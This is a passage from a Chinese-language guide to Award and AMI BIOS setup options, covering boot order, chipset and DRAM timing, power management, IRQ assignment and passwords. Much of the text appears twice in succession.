（15）Typematic Delay：如果Typematic Rate Setting选项置为Enable，那么可以用
此选项设定按下某一个键时，延迟多长时间后开始视为重复键入该键。该项可选250、
500、750、1000，单位为毫秒。
（16）Security Option:选择System时，每次开机启动时都会提示你输入密码，选择
Setup时，仅在进入BIOS设置时会提示你输入密码。

（17）PS/2 Mouse Function Control：当该项设为Enable，机器提供对于PS/2类型鼠
标的支持，AUTO可以在系统启动是自动侦测PS/2 Mouse，分配IRQ。
（18）Assign PCI IRQ For VGA:选Enable时，机器将自动设定PCI显示卡的IRQ到系统
的DRAM中，以提高显示速度和改善系统的性能。
（19）PCI/VGA Palett Snoop：该项用来设置PCI/VGA卡能否与MPEG ISA/VESA VGA卡一
起用。当PCI/VGA卡与MPEG ISA/VESA VGA卡一起用或使用其他非标准VGA时，该项应设
为Enable。
（20）OS Select For DRAM>64MB：如果使用OS/2操作系统，使用64MB以上的内存。该
项选为OS2。
（21）System BIOS Shadow:该选项的缺省设置默认为Enable，当它开启时，系统BIOS
将拷贝到系统Dram中，以提高系统的运行速度和改善系统的性能。
（22）Video BIOS Shadow:缺省设定为开启（Enable），当它开启时，显示卡的BIOS将
拷贝到系统DRAM中，以提高显示速度和改善系统的性能。
（23）C8000－CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映
射区，一般都设定为禁止（Disable）。如果有某一扩充卡ROM需要映射，则用户应搞清
楚该ROM将映射地址和范围，可以将上述的几个内存区域都置为Enable;但这样将造成内
存空间的浪费。因为映射区的地址空间将占用系统的640K～1024K之间的某一段内存。

Chipset Features Setup（芯片组功能设定）
该项用来设置系统板上芯片的特性。常见选项如下：
（1）ISA Bus Clock frequency（PCICLK/4）ISA传输速率设定。
设定值有：PCICLK/3；PCICLK/4。
（2）Auto Configuration（Enabled）自动状态设定。
当设定为Enabled时BIOS依最佳状况状态设定，此时BIOS会自动设定DRAM Timing，所以
会无法修改DRAM的细项时序，强烈建议选用Enabled，因为任意改变DRAM的时序可能造
成系统不稳或不开机。
（3）Aggressive Mode（Disabled）高级模式设定。
若想获得较好的效能时，而且系统在非常稳定状态下，可以尝试Enabled此项功能以增
加系统效能，不过必须使用速度较快DRAM（60ns以下）。

Power Management Setup（节电功能设定）
该项为电源管理设定，用来控制主板上的“绿色”功能。该功能定时关闭视频显示和硬
盘驱动器以实现节能的效果。
实现节电的模式有以下四种：
1.Doze模式，当设定时间一到，CPU时钟变慢，其他设备照常运作；
2.Standby模式，当设定时间一到，硬盘和显示将停止工作，其他设备照常运作；
3.Suspend模式，当设定时间一到，除CPU以外的所有设备都将停止工作；
4.HDD Power Down模式，当设定时间一到，硬盘停止工作，其他设备照常运作。
本菜单项下可供选择的内容如下：
（1）Power Management节电模式的主控项，有四种设定：
Max Saving（最大节电）在一个较短的系统不活动的周期（Doze、Standby、Suspend、
HDD Power Down四种模式的缺省值均为1分钟）以后，使系统进入节电模式，这种模式
节电最大。
MIN Saving（最小节电）在一段较长的系统不活动的周期在这种情况下，（Doze，
Standby，Suspend三种模式的缺省值均为1小时，HDD Power Down模式的缺省值为15分
钟）后，使系统进入节电模式。
Disable　关闭节电功能，是缺省设置。
User Defined（用户定义）允许用户根据自己的需要设定节电的模式。
（2）Video Off Method（视频关闭）该选项可设为V/H Sync＋Blank、Dpms、Blank
Screen三种。
V/H Sync＋Blank将关闭显示卡水平与垂直同步信号的输出端口，向视频缓冲区写入空
白信号。
DPMS（显示电源管理系统）设定允许BIOS在显示卡有节电功能时，对显示卡进行节能信
息的初始化。只有显示卡支持绿色功能时，用户才能使用这些设定。如果没有绿色功能
，则应将该行设定为Blank Screen（关掉屏幕）。
Blank Screen（关掉屏幕）当管理关掉显示器屏幕时，缺省设定能通过关闭显示器的垂
直和水平扫描以节约更多的电能。没有绿色功能的显示器，缺省设定只能关掉屏幕而不
能终止CRT的扫描。
（3）PM Timers（电源管理记时器）下面的几项分别表示对电源管理超时设置的控制。
Doze，Stand By和Suspend Mode项设置分别为该种模式激活前的机器闲置时间，在MAX
Saving模式，它每次在一分钟后激活。在MIN Saving模式，它在一小时后激活。
（4）Power Down和Resume Events（进入节电模式和从节电状态中唤醒的事件）。该项
下面所列述的事件可以将硬盘设在最低耗电模式，工作、等待和悬挂系统等非活动模式
中若有事件发生，如敲任何键或IRQ唤醒、鼠标动作、MODEM振铃时，系统自动从电源节
电模式下恢复过来。

PNP/PCI Configuration Setup（即插即用与PCI状态设定）
该菜单项用来设置即插即用设备和PCI设备的有关属性。
（1）PNP OS Installed：如果软件系统支持Plug&Play，如Win95，可以设置为YES。
（2）Resources Controlled By：AWARD BIOS支持“即插即用”功能，可以检测到全部
支持“即插即用”的设备，这种功能是为类似Win95操作系统所设计的，可以设置Auto
（自动）或Manual（手动）。
（3）Resources Configuration Data：缺省值是Disabled，如果选择Enabled，每次开
机时，Extend System Configuration Data（扩展系统设置数据）都会重新设置。
（4）IRQ3/4/5/7/9/10/11/12/14/15：在缺省状态下，除了IRQ3/4，所有的资源，都设
计为被PCI设备占用，如果某些ISA卡要占用某资源可以手动设置。

Intergrated Peripherals Setup（外部设备设定）
该菜单项用来设置集成主板上的外部设备的属性。
（1）IDE HDD Block Mode：如果选择Enable，可以允许硬盘用快速块模式（Fast
Block Mode）来传输数据。
（2）IDE PIO Mode：这个设置取决于系统硬盘的速度，共有AUTO，0，1，2，3，4五个
选项，Mode4硬盘传输速率大于是16.6MB/s，其它模式的小于这个速率。不要选择超过
硬盘速率的模式，这样会丢失数据。
（3）IDE UMDA（Ultra DMA）Mode：Intel 430TX芯片提供了Ultra DMA Mode，它可以
把传输速率提高到一个新的水准。

Load BIOS Defaults（装入BIOS缺省值）
主机板的CMOS中有一个出厂时设定的值。若CMOS内容被破坏，则要使用该项进行恢复。
由于BIOS缺省设定值可能关掉了所有用来提高系统的性能的参数，因此使用它容易找到
主机板的安全值和除去主板的错误。
该项设定只影响BIOS和Chipset特性的选定项。不会影响标准的CMOS设定。移动光标到
屏幕的该项然后按下Y或Enter键，屏幕显示是否要装入BIOS缺省设定值，键入Y即装入
，键入N即不装入。选择完后，返回主菜单。

Supervisor Password And User Password Setup（超级用户与普通用户密码设定）
User Passowrd Setting功能为设定密码。如果要设定此密码，首先应输入当前密码，
确定密码后按Y，屏幕自动回到主画面。输入User Passowrd可以使用系统，但不能修改
CMOS的内容。输入Supervisor Password可以输入、修改CMOS BIOS的值，Supervisor
Password是为了防止他人擅自修改CMOS的内容而设置的。用户如果使用IDE硬盘驱动器
，该项功能可以自动读出硬盘参数，并将它们自动记入标准CMOS设定中，它最多可以读
出四个IDE硬盘的参数。

以上介绍了Award BIOS Setup的常用选项的含义及设置办法。更改设置后，选Save
and Exit Setup项或按F10键保存，使所修改的内容生效。
AWARD BIOS是一种比较常用的BIOS，各主板制造商都其基础根据主板特性上进行了调
整。因而本文只介绍了AWARD BIOS的一些最普遍的设置，以供参考，读者还应仔细阅读
随主板附带的说明书。

AMI BIOS

    BIOS是英文Basic Input/Output System(基本输入/输出系统)的缩写，其程序储存
在主板上的 EPROM或Flash ROM 内，作用是测试装在主板上的部件能否正常工作，并提
供驱动程序接口，设定系统相关配备的组态。当你的系统配件与原CMOS参数不符合时，
或CMOS参数遗失时，或系统不稳定时，就需要进入BIOS设定程序，以重新配置正确的系
统组态。

进入AMI BIOS设定程序

    1. 打开系统电源或重新启动系统，显示器屏幕将出现自我测试的信息；
    2. 当屏幕中间出现"Press <Del> to enter setup"提示时，按下<Del> 键，就可
以进入BIOS设定程序。
    3. 以方向键移动至你要修改的选项，按下<Enter>键即可进入该选项的子画面；
    4. 使用 方向键及〈Enter〉键即可修改所选项目的值，也可用鼠标（包括PS/2鼠
标）选择BIOS选项并修改。
    5. 任何时候按下<Esc>键即可回到上一画面；
    6. 在主画面下，按下<Esc>键，选择“Saving Changes And Exit"即可储存你的新
设定并重新启动系统。选择“Exit Without Saving"，则会忽略你的改变而跳出设定程
序。

Standard Setup（标准设定）窗口

    Date/Time: 显示当前的日期/时间，可修改。
    Floppy Drive A，B: 设定软盘驱动器类型为None/720K/1.2M/1.44M/2.88M 。
    Pri Master/Slave以及Sec Master/Slave: 此选项可设定:
    HDD Type（硬盘类型）: Auto(自动检测)、SCSI(SCSI HDD)、CD－ROM驱动器、
Floptical(LS－120大容量软驱)或是Type 1～47等IDE设备。
    LBA/Large: 硬盘LBA/Large 模式是否打开。目前540M以上的硬盘都要将此选项打
开 (On)，但在Novell Netware 3.xx或4.xx版等网络操作系统下要视情况将它关掉
(Off)。
    Block Mode: 将此选项设为On，有助于硬盘存取速度加快，但有些旧硬盘不支持此
模式，必须将此选项设为Off。
    32 Bit Mode: 将此选项设为On，有助于在32位的操作系统（如WIN95/NT）下加快
硬盘传输速度，有些旧硬盘不支持此模式，必须将此选项设为Off。
    PIO Mode: 支持PIO Mode0～Mode5(DMA/33)。用BIOS程序自动检查硬盘时，会自动
设置硬盘的PIO Mode。
    注意：当你在系统中接上一台IDE设备（如硬盘、光驱等）时，最好进入BIOS，让
它自动检测。如果使用的是抽屉式硬盘的话，可将Type设成Auto，或将Primary以及
Secondary的Type都改成 Auto 即可。所谓Primary指的是第一IDE接口，对应于主板上
的IDE0插口，Secondary指的是第二IDE接口，对应于主板上的IDE1插口。每个IDE接口
可接Master/Slave（主/从）两台IDE设备。

Advanced Setup（高级设定）窗口

    1st/2rd/3rd/4th Boot Device: 开机启动设备的顺序，可选择由IDE0～3、SCSI、
光驱、软驱、 Floptical (LS－120大容量软驱)或由Network(网络)开机。
    S.M.A.R.T For HardDisk: 开启（Enable）硬盘S.M.A.R.T 功能。如果硬盘支持，
此功能可提供硬盘自我监控的功能。
    Quick Boot: 开启此功能后，可使开机速度加快。
    Floppy Drive Swap: 若将此功能Enable，可使A驱与B驱互换。
    PS/2 Mouse Support : 是否开启PS/2鼠标口，若设定为Enable，则开机时，将
IRQ12保留给PS/2鼠标使用，若设定为Disable，则IRQ12留给系统使用。
    Password Check: 设定何时检查Password(口令)，若设定成Setup时，每次进入
BIOS设定时将会要求输入口令，若设定成Always时，进入BIOS或系统开机时，都会要求
输入口令，但先决条件是必须先设定口令(Security窗口中的User选项)。
    Primary Display: 设定显示卡的种类。
    Internal Cache: 是否开启CPU内部高速缓存（L1 Cache），应设为Enable。
    External Cache: 是否开启主板上的高速缓存（L2 Cache），应设为Enable。
    System BIOS Cacheable: 是否将系统BIOS程序复制到内存中，以加快BIOS 存取速
度。
    C000－DC00，16K Shadow: 此8项是将主内存的UpperMemory（上位内存区）开启，
将所有插卡上 ROM程序映射到内存中，以加快CPU对BIOS的执行效率。Disable:不开启
本功能；Enable:开启，且可提供读写区段功能；Cached:开启，但不提供读写功能。

Chipset Setup（芯片组设定）窗口

    本功能中的选项有助于系统效率的提升，建议使用默认值。若将某些Chipset、
DRAM/SDRAM或SRAM 部分的Timing值设得过快，可能会导致系统"死机"或运行不稳定，
这时可试着将某些选项的速度值设定慢一点。
    USB Function Enabled: 此选项可开启USB接口的功能，如没有USB设备，建议将此
选项设为Disable， 否则会浪费一个IRQ资源。
    DRAM Write Timing: 设定DRAM的写入时序，建议值如下:
70ns DRAM: X－3－3－3； 60ns DRAM: X－2－2－2。
    Page Mode DRAM Read Timing: 设定DRAM读取时序，建议值如下 :
70ns DRAM: X－4－4－4； 60ns DRAM: X－3－3－3。
    RAS Precharge Period: 设定DRAM/EDO RAM的Precharge（预充电）时间，建议设
成4T。
    RAS to CAS Delay Time: 设定DRAM中RAS到CAS延迟时间，建议设定成3T。
    EDO DRAM Read Timing: 设定EDO DRAM读取时序，建议值如下:
70ns DRAM : X－3－3－3； 60ns DRAM : X－2－2－2。
    DRAM Speculative Read: 此选项是设定DRAM推测性的引导读取时序，建议设定成
Disable。
    SDRAM CAS Latency: 设定SDRAM的CAS信号延迟时序，建议设定值如下 :
    15ns(66MHz)/12ns(75MHz) SDRAM: 3
    10ns(100MHz) SDRAM: 2。
    SDRAM Timing: 设定SDRAM(同步内存)的时序，建议设定值如下:
    15ns(66MHz)/12ns(75MHz) SDRAM: 3－6－9
    10ns(100MHz) SDRAM: 3－4－7。
    注意：若系统使用SDRAM不稳时，建议将SDRAM速度调慢。
    SDRAM Speculative Read : 此选项是设定SDRAM推测性的引导读取时序，建议设定
成Disable。
    Pipe Function: 此选项设定是否开启Pipe Function（管道功能），建议设定成
Enable。
    Slow Refresh: 设定DRAM的刷新速率，有15/30/60/120us ，建议设在60us。
    Primary Frame Buffer: 此选项保留，建议设定成Disable。
    VGA Frame Buffer: 设定是否开启VGA帧缓冲，建议设为Enable。
    Passive Release: 设定Passive Release（被动释放）为Enable时，可确保CPU与
PCI总线主控芯片（PCI Bus Master）能随时重获对总线的控制权。
    ISA Line Buffer: 是否开启ISA总线的Line Buffer，建议设为Enable。
    Delay Transaction: 设定是否开启芯片组内部的Delay Transaction（延时传送）
，建议设成 Disable。
    AT Bus Clock: 设定ISA总线时钟，建议设成Auto。

Power Management Setup（能源管理）窗口

    能源管理功能可使大部份周边设备在闲置时进入省电功能模示，减少耗电量，达到
节约能源的目的。电脑在平常操作时，是工作在全速模式状态，而电源管理程序会监视
系统的图形、串并口、硬盘的存取、键盘、鼠标及其他设备的工作状态，如果上述设备
都处于停顿状态，则系统就会进入省电模式，当有任何监控事件发生，系统即刻回到全
速工作模式的状态。省电模式又分为“全速模式(Normal)、打盹模式 (Doze)、待命模
式(Standby)、沉睡模式(Suspend)"，系统耗电量大小顺序:Normal>Doze>
Standby > Suspend。
    Power Management/APM: 是否开启APM省电功能。若开启(Enable)，则可设定省电
功能。
    Green PC Monitor Power State/Video Power Down Mode/Hard Disk Power Down
Mode : 设定显示器、显示卡以及硬盘是否开启省电模式，可设定成Standby、Suspend
以及Off(即不进入省电模式)。
    Video Power Down Mode: 设定显示器在省电模式下的状态 isable: 不设定 ；
Stand By: 待命模式；Suspend: 沉睡模式。
    Hard Disk Power Down Mode: 设定硬盘在省电模式下的状态。（同上）
    Standby Timeout/Suspend Timeout: 本选项可设定系统在闲置几分钟后，依序进
入Standby Mode/Suspend Mode等省电模式。
    Display Activity: 当系统进入Standby Mode时，显示器是否进入省电模示，
Ingroe:忽略不管；Monitor:开启。
    Monitor Serial Port/Paralell Port/Pri－HDD/Sec－ HDD/VGA /Audio/Floppy:
当系统进入省电模式后，是否监视串并行口、主从硬盘、显示卡、声卡、软驱的动作。
Yes:监视，即各设备如有动作，则系统恢复到全速工作模式；No:不监视。
    Power Button Override: 是否开启电源开关功能。
    Power Button Function: 此选项是设定当使用ATX电源时，电源按扭（SUS－SW）
的作用。 Soft Off: 按一次就进入Suspend Mode，再按一次就恢复运行。Green: 按第
一下便是开机，关机时要按住4秒。
    Ring resume From Soft Off:是否开启Modem唤醒功能。
    RTC Alarm Resume From Soft Off: 是否设定BIOS 定时开机功能。

PCI/PnP Setup窗口

    此选项可设定即插即用(PnP)功能。
    OnBoard USB: 是否开启芯片组中的USB功能。
    Plug and Play Aware OS: 如你的操作系统(OS)具有PnP功能(如 Win95)，此项应
选Yes；若不是，则选No。如某些 PnP卡无法检测到时，建议设成No。
    PCI Latency Timer: 此选项可设定PCI时钟的延迟时序。
    Offboard PCI IDE Card: 如使用了其它的PCI IDE卡，则此项必须设定，这要视你
的PCI IDE卡是插在哪个Slot(1－4)上而定，并设定以下各IDE IRQ 值。Slot5、6以及
Hardwared为保留选项。
    Offboard PCI IDE Primary IRQ: 设定PCI IDE卡上IDE 0所要占用的INT＃ ，一般
都是设定成INT＃A。
    Offboard PCI IDE Secondary IRQ: 设定PCI IDE卡上IDE 1所要占用的INT＃，一
般都是设定成 INT＃B。
    Assign IRQ to PCI VGA Card: 指定一个IRQ给VGA卡使用，一般不用指定IRQ给VGA
卡。
    IRQ 3、4、5、7、9、10、11、12、14、15/DMA Channel 0、1、3、5、6、7:本选
项是设定各IRQ/DMA 是否让PnP卡自动配置，若设定成PCI/PnP，则BIOS检测到PnP卡时
，会挑选你所有设成 PCI/PnP状态的其中一个IRQ/DMA来使用；反之，若设成ISA/EISA
，则BIOS 将不会自动配置。一般设为PCI/PnP。

Peripheral Setup（外围设备设定）窗口

    Onboard FDC: 是否启用主板上的软驱接口。
    Onboard Serial Port 1: 选择串行口1（COM1）的地址，一般设成Auto。
    Serial Port1 IRQ: 此选项可设定串行口1的IRQ，建议设成4。
    Onboard Serial Port 2: 选择串行口2的地址， 一般设成Auto。
    Serial Port2 Mode : 若设成 Normal，为一般接鼠标、Modem用；如有红外线装置
(IrDA)，则建议设成IrDA ASKIR。
    Serial Port2 IRQ: 此选项可设定串行口2的IRQ，建议设成3。
    Onboard Parallel Port: 选择并行口的地址。
    Onboard Parallel Mode: 选择并行口的传输模式(ECP/EPP/Normal)。默认为标准
模式(Normal)。
    Parallel Mode IRQ : 设定并行口IRQ，建议设定成7。
    EPP Version: 设定EPP Mode为1.7或1.9 版。
    Onboard IDE : 是否启用主板上的PCI IDE0、IDE1接口。如果采用外接的IDE卡，
则此项必须改成 Disable，反之则设成Both。此选项若设错，将会导致硬盘、光驱等
IDE设备检测不到。

Security(安全）窗口

    User:允许User(用户)设定密码，输入密码后，必须再输入一次确认。
    Anti－Virus：此选项开启后，可防止病毒入侵硬盘的Boot区以及BIOS。

Utility (实用)窗口

    Detect IDE：此功能可以自动检测所有接在IDE0及IDE1上的设备，包括硬盘、CD－
ROM、LS－120等，且会自动判断其PIO模式，以及LBA/Normal/Large模式，一次即可检
测完毕。


BIOS 设置详解

《一键清理系统垃圾》

BIOS 设置详解

AWARD BIOS
AWARD BIOS是目前应用最为广泛的一种BIOS。本文将详细介绍一下AWARD BIOS中的有关设置选项的含义和设置方法，在AWARD BIOS的主菜单中主要有以下几个菜单项：
Standard CMOS Setup（标准CMOS设定）：
这个选项可以设置系统日期、时间、IDE设备、软驱A与B、显示系统的类型、错误处理方法等。
（1）在IDE设备设置中，用户可以在Type（类型）和Mode（模式）项设为Auto，使每次启动系统时BIOS自动检测硬盘。也可以在主菜单中的IDE HDD Auto Detection操作来设置。用户还可以使用User选项，手动设定硬盘的参数。必须输入柱面数（Cyls），磁头数（Heads），写预补偿（Precomp），磁头着陆区（Landz），每柱面扇区数（Sectorxs），工作模式（Mode）等几种参数。硬盘大小在上述参数设定后自动产生。
（2）显示类型可选EGA/VGA（EGA、VGA、SEGA、SVGA、PGA显示适配卡选用）、CGA40（CGA显示卡，40列方式）、CGA80（CGA显示卡，80列方式）、MONO（单色显示方式，包括高分辨率单显卡）等四种，以现在我们使用的计算机来看，绝大多数都属于EGA/VGA显示类型。
（3）暂停的出错状态选项有：All Errors（BIOS检测到任何错误，系统启动均暂停并且给出出错提示）、No Errors（BIOS检测到任何错误都不使系统启动暂停）、All But Keyboard（BIOS检测到除了磁盘之外的错误后使系统启动暂停，磁盘错误暂停）、All But Disk/Key（BIOS检测到除了键盘或磁盘之外的错误后使系统启动暂停。
BIOS Features Setup（BIOS功能设定）
该项用来设置系统配置选项清单，其中有些选项由主板本身设计确定，有些选项用户可以进行修改设定，以改善系统的性能。常见选项说明如下：
（1）Virus Warning（病毒警告）：这项功能在外部数据写入硬盘引导区或分配表的时候，会提出警告。为了避免系统冲突，一般将此功能关闭，置为Disable（关闭）。
（2）CPU Internal Cache（CPU Level 1 catch）：缺省为Enable（开启），它允许系统使用CPU内部的第一级Cache。486以上档次的CPU内部一般都带有Cache，除非当该项设为开启时系统工作不正常，此项一般不要轻易改动。该项若置为Disable，将会严重影响系统的性能。
（3）External Cache（CPU Level 1 catch）：缺省设为Enable，它用来控制主板上的第二级（L2）Cache。根据主板上是否带有Cache，选择该项的设置。
（4）BIOS Update：开启此功能则允许BIOS升级，如关闭则无法写入BIOS。
（5）Quick Power On Self Test：缺省设置为Enable，该项主要功能为加速系统上电自测过程，它将跳过一些自测试。使引导过程加快。
（6）Hard Disk Boot From（HDD Sequence SCSI/IDE First）:选择由主盘、从盘或SCSI硬盘启动。
（7）Boot Sequence：选择机器开电时的启动顺序。有些BIOS将SCSI硬盘也列在其中，此外比较新的主板还提供了LS 120和ZIP等设备的启动支持，一般BIOS，都有以下四种启动顺序：C，A（系统将按硬盘，软驱顺序寻找启动盘）；A，C（系统将按软驱，硬盘顺序寻找启动盘）；CDROM，C，A（系统按CDROM，硬盘，软驱顺序寻找启动盘）；C，CDROM，A（系统按硬盘，CDROM，软驱顺序寻找启动盘）。
（8）Swap Floppy Drive:（交换软盘驱动器）缺省设定为Disable。当它Disable时，BIOS把软驱连线扭接端子所接的软盘驱动器当作第一驱动器。当它开启时，BIOS将把软驱连线对接端子所接的软盘驱动器当作第一驱动器，即在DOS下A盘当作B盘用，B盘当作A盘用。
（9）Boot Up Floppy Seek：当Enable时，机器启动时BIOS将对软驱进行寻道操作。
（10）Floppy Disk Access Contol：当该项选在R/W状态时，软驱可以读和写，其它状态只能读。
（11）Boot Up Numlock Strtus:该选项用来设置小键盘的缺省状态。当设置为ON时，系统启动后，小键盘的缺省为数字状态；设为OFF时，系统启动后，小键盘的状态为箭头状态。
（12）Boot Up System Speed：该选项用来确定系统启动时的速度为HIGH还是LOW。
（13）Typematic Rate Setting:该项可选Enable和Disable。当置为Enable时，如果按下键盘上的某个键不放，机器按你重复按下该键对待；当置为Disable时，如果按下键盘上的某个键不放，机器按键入该键一次对待。
（14）Typematic Rate:如果Typematic Rate Setting选项置为Enable，那么可以用此选项设定当你按下键盘上的某个键一秒钟，那么相当于按该键6次。该项可选6、8、10、12、15、20、24、30。
（15）Typematic Delay：如果Typematic Rate Setting选项置为Enable，那么可以用此选项设定按下某一个键时，延迟多长时间后开始视为重复键入该键。该项可选250、500、750、1000，单位为毫秒。
（16）Security Option:选择System时，每次开机启动时都会提示你输入密码，选择Setup时，仅在进入BIOS设置时会提示你输入密码。
（17）PS/2 Mouse Function Control：当该项设为Enable，机器提供对于PS/2类型鼠标的支持，AUTO可以在系统启动是自动侦测PS/2 Mouse，分配IRQ。
（18）Assign PCI IRQ For VGA:选Enable时，机器将自动设定PCI显示卡的IRQ到系统的DRAM中，以提高显示速度和改善系统的性能。
（19）PCI/VGA Palett Snoop：该项用来设置PCI/VGA卡能否与MPEG ISA/VESA VGA卡一起用。当PCI/VGA卡与MPEG ISA/VESA VGA卡一起用或使用其他非标准VGA时，该项应设为Enable。
（20）OS Select For DRAM>64MB：如果使用OS/2操作系统，使用64MB以上的内存。该项选为OS2。
（21）System BIOS Shadow:该选项的缺省设置默认为Enable，当它开启时，系统BIOS将拷贝到系统Dram中，以提高系统的运行速度和改善系统的性能。
（22）Video BIOS Shadow:缺省设定为开启（Enable），当它开启时，显示卡的BIOS将拷贝到系统DRAM中，以提高显示速度和改善系统的性能。
（23）C8000－CBFFF Shadow/DFFFF Shadow:这些内存区域用来作为其他扩充卡的ROM映射区，一般都设定为禁止（Disable）。如果有某一扩充卡ROM需要映射，则用户应搞清楚该ROM将映射地址和范围，可以将上述的几个内存区域都置为Enable;但这样将造成内存空间的浪费。因为映射区的
地址空间将占用系统的640K～1024K之间的某一段内存。
Chipset Features Setup（芯片组功能设定）
该项用来设置系统板上芯片的特性。常见选项如下：
（1）ISA Bus Clock frequency（PCICLK/4）ISA传输速率设定。设定值有：PCICLK/3；PCICLK/4。
（2）Auto Configuration（Enabled）自动状态设定。
当设定为Enabled时BIOS依最佳状况状态设定，此时BIOS会自动设定DRAM Timing，所以会无法修改DRAM的细项时序，强烈建议选用Enabled，因为任意改变DRAM的时序可能造成系统不稳或不开机。
（3）Aggressive Mode（Disabled）高级模式设定。
若想获得较好的效能时，而且系统在非常稳定状态下，可以尝试Enabled此项功能以增加系统效能，不过必须使用速度较快DRAM（60ns以下）。
Power Management Setup（节电功能设定）
该项为电源管理设定，用来控制主板上的“绿色”功能。该功能定时关闭视频显示和硬盘驱动器以实现节能的效果。
实现节电的模式有以下四种：
1.Doze模式，当设定时间一到，CPU时钟变慢，其他设备照常运作；
2.Standby模式，当设定时间一到，硬盘和显示将停止工作，其他设备照常运作；
3.Suspend模式，当设定时间一到，除CPU以外的所有设备都将停止工作；
4.HDD Power Down模式，当设定时间一到，硬盘停止工作，其他设备照常运作。
本菜单项下可供选择的内容如下：
（1）Power Management节电模式的主控项，有四种设定：
Max Saving（最大节电）在一个较短的系统不活动的周期（Doze、Standby、Suspend、HDD Power Down四种模式的缺省值均为1分钟）以后，使系统进入节电模式，这种模式节电最大。
MIN Saving（最小节电）在一段较长的系统不活动的周期在这种情况下，（Doze，Standby，Suspend三种模式的缺省值均为1小时，HDD Power Down模式的缺省值为15分钟）后，使系统进入节电模式。
Disable　关闭节电功能，是缺省设置。
User Defined（用户定义）允许用户根据自己的需要设定节电的模式。
（2）Video Off Method（视频关闭）该选项可设为V/H Sync＋Blank、Dpms、Blank Screen三种。 V/H Sync＋Blank将关闭显示卡水平与垂直同步信号的输出端口，向视频缓冲区写入空白信号。 DPMS（显示电源管理系统）设定允许BIOS在显示卡有节电功能时，对显示卡进行节能信息的初始化。只有显示卡支持绿色功能时，用户才能使用这些设定。如果没有绿色功能，则应将该行设定为Blank Screen（关掉屏幕）。
Blank Screen（关掉屏幕）当管理关掉显示器屏幕时，缺省设定能通过关闭显示器的垂直和水平扫描以节约更多的电能。没有绿色功能的显示器，缺省设定只能关掉屏幕而不能终止CRT的扫描。
（3）PM Timers（电源管理记时器）下面的几项分别表示对电源管理超时设置的控制。Doze，Stand By和Suspend Mode项设置分别为该种模式激活前的机器闲置时间，在MAX Saving模式，它每次在一分钟后激活。在MIN Saving模式，它在一小时后激活。
（4）Power Down和Resume Events（进入节电模式和从节电状态中唤醒的事件）。该项下面所列述的事件可以将硬盘设在最低耗电模式，工作、等待和悬挂系统等非活动模式中若有事件发生，如敲任何键或IRQ唤醒、鼠标动作、MODEM振铃时，系统自动从电源节电模式下恢复过来。
PNP/PCI Configuration Setup（即插即用与PCI状态设定）
该菜单项用来设置即插即用设备和PCI设备的有关属性。
（1）PNP OS Installed：如果软件系统支持Plug&Play，如Win95，可以设置为YES。
（2）Resources Controlled By：AWARD BIOS支持“即插即用”功能，可以检测到全部支持“即插即用”的设备，这种功能是为类似Win95操作系统所设计的，可以设置Auto（自动）或Manual（手动）。
（3）Resources Configuration Data：缺省值是Disabled，如果选择Enabled，每次开机时，Extend System Configuration Data（扩展系统设置数据）都会重新设置。
（4）IRQ3/4/5/7/9/10/11/12/14/15：在缺省状态下，除了IRQ3/4，所有的资源，都设计为被PCI设备占用，如果某些ISA卡要占用某资源可以手动设置。
Intergrated Peripherals Setup（外部设备设定）
该菜单项用来设置集成主板上的外部设备的属性。
（1）IDE HDD Block Mode：如果选择Enable，可以允许硬盘用快速块模式（Fast Block Mode）来传输数据。
（2）IDE PIO Mode：这个设置取决于系统硬盘的速度，共有AUTO，0，1，2，3，4五个选项，Mode4硬盘传输速率大于是16.6MB/s，其它模式的小于这个速率。不要选择超过硬盘速率的模式，这样会丢失数据。
（3）IDE UMDA（Ultra DMA）Mode：Intel 430TX芯片提供了Ultra DMA Mode，它可以把传输速率提高到一个新的水准。
Load BIOS Defaults（装入BIOS缺省值）
主机板的CMOS中有一个出厂时设定的值。若CMOS内容被破坏，则要使用该项进行恢复。由于BIOS缺省设定值可能关掉了所有用来提高系统的性能的参数，因此使用它容易找到主机板的安全值和除去主板的错误。该项设定只影响BIOS和Chipset特性的选定项。不会影响标准的CMOS设定。移动光标到屏幕的该项然后按下Y或Enter键，屏幕显示是否要装入BIOS缺省设定值，键入Y即装入，键入N即不装入。选择完后，返回主菜单。
Supervisor Password And User Password Setup（超级用户与普通用户密码设定）
User Passowrd Setting功能为设定密码。如果要设定此密码，首先应输入当前密码，确定密码后按Y，屏幕自动回到主画面。输入User Passowrd可以使用系统，但不能修改CMOS的内容。输入Supervisor Password可以输入、修改CMOS BIOS的值，Supervisor Password是为了防止
他人擅自修改CMOS的内容而设置的。用户如果使用IDE硬盘驱动器，该项功能可以自动读出硬盘参数，并将它们自动记入标准CMOS设定中，它最多可以读出四个IDE硬盘的参数。
以上介绍了Award BIOS Setup的常用选项的含义及设置办法。更改设置后，选Save and Exit Setup项或按F10键保存，使所修改的内容生效。
AWARD BIOS是一种比较常用的BIOS，各主板制造商都其基础根据主板特性上进行了调整。因而本文只介绍了AWARD BIOS的一些最普遍的设置，以供参考，读者还应仔细阅读随主板附带的说明书。
AMI BIOS
    BIOS是英文Basic Input/Output System(基本输入/输出系统)的缩写，其程序储存在主板上的 EPROM或Flash ROM 内，作用是测试装在主板上的部件能否正常工作，并提供驱动程序接口，设定系统相关配备的组态。当你的系统配件与原CMOS参数不符合时，或CMOS参数遗失时，或系统不稳定时，就需要进入BIOS设定程序，以重新配置正确的系统组态。
进入AMI BIOS设定程序
    1. 打开系统电源或重新启动系统，显示器屏幕将出现自我测试的信息；
    2. 当屏幕中间出现"Press to enter setup"提示时，按下 键，就可以进入BIOS设定程序。
    3. 以方向键移动至你要修改的选项，按下键即可进入该选项的子画面；
    4. 使用 方向键及〈Enter〉键即可修改所选项目的值，也可用鼠标（包括PS/2鼠标）选择BIOS选项并修改。
    5. 任何时候按下键即可回到上一画面；
    6. 在主画面下，按下键，选择“Saving Changes And Exit"即可储存你的新设定并重新启动系统。选择“Exit Without Saving"，则会忽略你的改变而跳出设定程序。
Standard Setup（标准设定）窗口
    Date/Time: 显示当前的日期/时间，可修改。
    Floppy Drive A，B: 设定软盘驱动器类型为None/720K/1.2M/1.44M/2.88M 。
    Pri Master/Slave以及Sec Master/Slave: 此选项可设定:
    HDD Type（硬盘类型）: Auto(自动检测)、SCSI(SCSI HDD)、CD－ROM驱动器、Floptical(LS－120大容量软驱)或是Type 1～47等IDE设备。
